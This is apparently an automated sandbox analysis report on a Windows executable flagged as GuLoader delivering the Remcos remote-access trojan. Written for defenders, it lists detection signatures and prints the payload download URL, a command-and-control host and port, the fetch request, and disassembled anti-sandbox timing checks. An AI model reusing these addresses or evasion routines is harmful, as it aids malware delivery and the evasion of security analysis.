Play interactive tour

Edit tour

Windows Analysis Report kGSHiWbgq9.exe

Overview

General Information

Sample Name:	kGSHiWbgq9.exe
Analysis ID:	457930
MD5:	27bf14807bc9d5cd2d823293f43c3a3a
SHA1:	08eeed11867aa351be0d6c48da283721ee6c0769
SHA256:	55fd5769df0df23d4140a34d07dc2c833b43ac1060f4d0992bdd27316041c69a
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample file is different than original file name gathered from version info

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

kGSHiWbgq9.exe (PID: 6592 cmdline: 'C:\Users\user\Desktop\kGSHiWbgq9.exe' MD5: 27BF14807BC9D5CD2D823293F43C3A3A)

kGSHiWbgq9.exe (PID: 6636 cmdline: 'C:\Users\user\Desktop\kGSHiWbgq9.exe' MD5: 27BF14807BC9D5CD2D823293F43C3A3A)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: kGSHiWbgq9.exe PID: 6636	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUu"}

Multi AV Scanner detection for submitted file

Show sources

Source: kGSHiWbgq9.exe

Virustotal: Detection: 21%

Perma Link

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Machine Learning detection for sample

Show sources

Source: kGSHiWbgq9.exe

Joe Sandbox ML: detected

Source: kGSHiWbgq9.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_PRUu

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: wealthyrem.ddns.net

Source: global traffic

TCP traffic: 192.168.2.4:49759 -> 194.5.97.128:39200

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp

String found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.bin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\kGSHiWbgq9.exe

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F90E6 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2873 NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5968 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F443A NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5A62 NtWriteVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7A7A NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4B7C NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4BC9 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8FBB NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4DB6 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569C03 LdrInitializeThunk,Sleep,LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569B39 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569C2B LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 11_2_00569B22 LdrInitializeThunk,NtProtectVirtualMemory,

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5781
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F94D8
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F853B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F05A1
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0BDC
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2873
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5968
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0211
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4339
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F40B7
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0691
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F86DB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F86F4
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F443A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F95C6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F85E7
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5A62
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7A7A
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2A77
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3ACE
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0B59
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4B7C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4BC9
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3BFF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8802
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3874
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F891F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0921
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F398F
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7E5C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F1E99
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0ED2
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2FD3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F8C2C
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3CEF
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0CFA
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3CF2
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5D78
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F1DA0
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F4DB6
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F0DD5

Source: kGSHiWbgq9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kGSHiWbgq9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: kGSHiWbgq9.exe, 00000001.00000000.646609422.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 00000001.00000002.773544375.0000000002090000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 0000000B.00000000.772049826.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726897873.0000000000860000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs kGSHiWbgq9.exe
Source: kGSHiWbgq9.exe	Binary or memory string: OriginalFilenamePAAKLDENDE.exe vs kGSHiWbgq9.exe

Source: kGSHiWbgq9.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/2

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA49EFCEC46BBB65C.TMP

Jump to behavior

Source: kGSHiWbgq9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: kGSHiWbgq9.exe

Virustotal: Detection: 21%

Source: unknown	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408873 push esp; ret
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_004088C0 push esp; ret
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_004014E9 push es; ret
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408CB2 push esi; ret
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_0040891C push esi; retf
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00407D36 pushad ; iretd
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408672 push esi; ret
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00407E22 push ds; iretd
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408624 push esp; ret
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408ADE push esi; retf
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_00408695 push esi; ret
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F6625 push ebp; iretd

Source: initial sample

Static PE information: section name: .text entropy: 7.07266809617

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2FD3
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0298 second address: 00000000020F0298 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7EAD second address: 00000000020F7EAD instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F9858 second address: 00000000020F9858 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7C30 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor ebx, 191FF64Ah 0x00000010 test ax, cx 0x00000013 add ebx, 6B6EB43Bh 0x00000019 cmp edx, ebx 0x0000001b mov ebx, dword ptr [ebp+0000017Bh] 0x00000021 jle 00007FB8B0E6501Bh 0x00000023 call 00007FB8B0E6528Ah 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0EB2 second address: 00000000020F0F20 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test eax, ecx 0x0000000c push ebx 0x0000000d jmp 00007FB8B03661FFh 0x0000000f call 00007FB8B03661D0h 0x00000014 pop ebx 0x00000015 jmp ebx 0x00000017 pop ebx 0x00000018 mov dword ptr [ebp+00000204h], eax 0x0000001e mov eax, B2FB5E9Eh 0x00000023 xor eax, CC322E20h 0x00000028 xor eax, FC8DB287h 0x0000002d test dx, bx 0x00000030 sub eax, 8244C239h 0x00000035 push eax 0x00000036 mov eax, dword ptr [ebp+00000204h] 0x0000003c mov dword ptr [ebp+0000026Fh], ecx 0x00000042 mov ecx, 556F3EE3h 0x00000047 cmp esi, 3EDD9594h 0x0000004d add ecx, A870EBA2h 0x00000053 pushad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0F20 second address: 00000000020F0F20 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000561C79 second address: 0000000000561C79 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056322B second address: 000000000056326F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor dword ptr [ebp+14h], AA1EA117h 0x00000011 add dword ptr [ebp+14h], 28368260h 0x00000018 mov dword ptr [ebp+00000277h], esi 0x0000001e mov esi, C4615DA9h 0x00000023 test ebx, 3C315E73h 0x00000029 xor esi, 49D529C1h 0x0000002f xor esi, F48EAD89h 0x00000035 test ch, FFFFFF8Ch 0x00000038 sub esi, 793AD9E1h 0x0000003e pushad 0x0000003f mov ecx, 000000B7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000563DB3 second address: 0000000000563DB3 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0298 second address: 00000000020F0298 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7EAD second address: 00000000020F7EAD instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F9858 second address: 00000000020F9858 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7CB5 second address: 00000000020F7CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FB8B0E65173h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007FB8B0E65169h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007FB8B0E6506Ch 0x00000063 call 00007FB8B0E650C7h 0x00000068 call 00007FB8B0E65194h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7DF9 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DDFE68D6h 0x00000013 xor eax, 51E6CF38h 0x00000018 sub eax, D694E780h 0x0000001d xor eax, B583C06Fh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FB8B0366842h 0x0000002e popad 0x0000002f call 00007FB8B03663C1h 0x00000034 lfence 0x00000037 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F7C30 second address: 00000000020F7DF9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor ebx, 191FF64Ah 0x00000010 test ax, cx 0x00000013 add ebx, 6B6EB43Bh 0x00000019 cmp edx, ebx 0x0000001b mov ebx, dword ptr [ebp+0000017Bh] 0x00000021 jle 00007FB8B0E6501Bh 0x00000023 call 00007FB8B0E6528Ah 0x00000028 lfence 0x0000002b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0EB2 second address: 00000000020F0F20 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test eax, ecx 0x0000000c push ebx 0x0000000d jmp 00007FB8B03661FFh 0x0000000f call 00007FB8B03661D0h 0x00000014 pop ebx 0x00000015 jmp ebx 0x00000017 pop ebx 0x00000018 mov dword ptr [ebp+00000204h], eax 0x0000001e mov eax, B2FB5E9Eh 0x00000023 xor eax, CC322E20h 0x00000028 xor eax, FC8DB287h 0x0000002d test dx, bx 0x00000030 sub eax, 8244C239h 0x00000035 push eax 0x00000036 mov eax, dword ptr [ebp+00000204h] 0x0000003c mov dword ptr [ebp+0000026Fh], ecx 0x00000042 mov ecx, 556F3EE3h 0x00000047 cmp esi, 3EDD9594h 0x0000004d add ecx, A870EBA2h 0x00000053 pushad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 00000000020F0F20 second address: 00000000020F0F20 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000567CB5 second address: 0000000000567CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FB8B03662D3h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007FB8B03662C9h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007FB8B03661CCh 0x00000063 call 00007FB8B0366227h 0x00000068 call 00007FB8B03662F4h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc
